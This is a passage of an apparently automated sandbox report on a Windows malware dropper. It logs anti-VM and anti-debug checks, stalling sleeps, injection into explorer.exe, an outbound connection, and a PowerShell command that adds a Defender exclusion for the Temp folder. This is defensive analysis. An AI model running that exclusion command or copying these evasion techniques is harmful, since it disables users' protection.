                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe TID: 8000Thread sleep time: -46000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 7980Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep count: 5728 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep time: -3436800s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep count: 4254 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe TID: 4296Thread sleep time: -2552400s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -3689348814741908s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7620Thread sleep count: 1122 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599844s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599708s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599485s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -599313s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598985s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598678s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598486s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598338s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598232s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598123s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -598011s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597825s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597683s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597556s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597437s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe TID: 7600Thread sleep time: -597317s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe TID: 8168Thread sleep time: -130000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe TID: 5676Thread sleep count: 32 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe TID: 5676Thread sleep time: -160000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7316Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 7316Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 7000Thread sleep count: 433 > 30
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_64947880 GetSystemTimeAdjustment followed by cmp: cmp eax, 03h and CTI: jle 64947899h
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_00402902 FindFirstFileW
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_0040689A FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Code function: 1_2_00404B47 FindFirstFileW
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Code function: 1_2_00405FE9 GetSystemInfo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported twice)
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Thread delayed: 109 consecutive records with descending delay times:
600000, 599886, 599765, 599655, 599543, 599424, 599303, 599172, 599048, 598922,
598812, 598671, 598333, 598187, 597992, 597867, 597746, 597578, 597440, 597307,
597182, 597015, 596892, 596771, 596625, 596497, 596359, 596156, 596020, 595859,
595250, 594844, 594699, 594578, 594422, 594265, 594071, 593916, 593784, 593625,
593484, 593355, 593249, 593061, 592578, 592047, 591859, 591636, 591483, 591353,
591187, 591031, 590895, 590703, 590527, 590366, 590233, 590062, 589265, 589085,
588875, 588716, 588594, 588464, 588328, 588015, 587703, 587500, 587340, 587193,
587015, 586554, 586163, 586009, 585883, 585765, 585624, 585482, 585373, 585264,
585154, 585040, 584922, 584811, 584702, 584591, 584470, 584344, 584234, 584115,
583828, 583620, 583469, 583233, 583123, 583015, 582905, 582795, 582684, 582577,
582466, 582330, 582203, 582093, 581982, 581874, 581765, 581656, 581547
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Thread delayed: 17 consecutive records with descending delay times:
600000, 599844, 599708, 599485, 599313, 598985, 598678, 598486, 598338, 598232,
598123, 598011, 597825, 597683, 597556, 597437, 597317
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dll
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dll
Source: Amcache.hve.30.dr | Binary or memory string: VMware
Source: Amcache.hve.30.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Mon17e1fac3fd3d84b.exe, 00000015.00000002.1820974132.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF526000.00000004.00000020.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1988739257.000002D9EF58F000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003223000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000324E000.00000004.00000020.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.3461889632.000002804842B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002B.00000002.3465196728.000002804D857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000002F.00000003.3105498563.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.30.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.30.dr | Binary or memory string: vmci.sys
Source: control.exe, 00000038.00000002.1954525048.0000000002C34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\sa`
Source: Mon178817e243.exe.1.dr | Binary or memory string: vmware
Source: explorer.exe, 0000002F.00000003.3105498563.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AB7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWZ-
Source: explorer.exe, 0000002F.00000000.1908199562.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: Amcache.hve.30.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.30.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.30.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe.1.dr | Binary or memory string: <Module>pctool.exeProgramStubRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorMainDownloadPayloadRunOnStartup.ctorExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatorurlregNameAppPathHidepathlpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributepctoolEnvironmentExitSystem.ThreadingThreadSleepSystem.IOPathGetTempPathCombineFileWriteAllBytesSystem.NetServicePointManagerSecurityProtocolTypeset_SecurityProtocolWebRequestCreateHttpWebRequestset_MethodWebResponseGetResponseHttpWebResponseStreamGetResponseStreamMemoryStreamCopyToCloseDisposeToArrayIDisposableAppDomainget_CurrentDomainget_FriendlyNameStringConcatExistsAssemblyGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineOpenSubKeySetValueCurrentUserException.cctorSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_Currentget_ItemToStringToLowerop_EqualityToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks
Source: Amcache.hve.30.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.30.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.30.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.30.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.30.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: explorer.exe, 0000002F.00000002.4164547878.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 0000002F.00000000.1908199562.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: Mon17742f90b916675f2.exe, 00000012.00000002.4150744585.00000000009FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&&
Source: Mon1795d04d4bd.exe, 0000001C.00000002.1831570422.0000000000788000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
Source: explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.30.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: explorer.exe, 0000002F.00000002.4178462756.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.30.dr | Binary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: Amcache.hve.30.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.30.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.30.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.30.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.30.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe.1.dr | Binary or memory string: DetectVirtualMachine
Source: Amcache.hve.30.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.30.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: setup_install.exe, 00000002.00000002.1969282898.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4148367309.0000000001439000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4169425716.0000000006BAC000.00000004.00000020.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4148148586.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 0000002F.00000000.1908199562.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 0000002F.00000000.1908199562.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 0000002F.00000002.4178462756.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Amcache.hve.30.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.30.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.30.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.30.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.30.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                  Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | Process queried: DebugPort (reported 6 times)
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Process queried: DebugPort (reported twice)
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Code function: 18_2_00855427 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_004014E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Code function: 18_2_00855A91 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Code function: 18_2_008588D7 GetProcessHeap
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_0040115C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_0040CB0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_0040CB10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_00401150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_004013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_649486F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: 2_2_649486EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Code function: 18_2_00855427 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00852D4A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00852D4A
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_0085295C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0085295C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00852EA9 SetUnhandledExceptionFilter,18_2_00852EA9
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F673B10 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF72F673B10
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A2354 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF72F6A2354
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: bgjifes.47.dr
Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 80
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Thread created: C:\Windows\explorer.exe EIP: 3441950
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | Memory written: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | Memory written: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Code function: 0_2_00403C0B GetTempPathW,GetUserDefaultUILanguage,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,0_2_00403C0B
Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Process created: C:\Users\user\AppData\Local\Temp\setup_installer.exe "C:\Users\user\AppData\Local\Temp\setup_installer.exe"
Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe
Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe
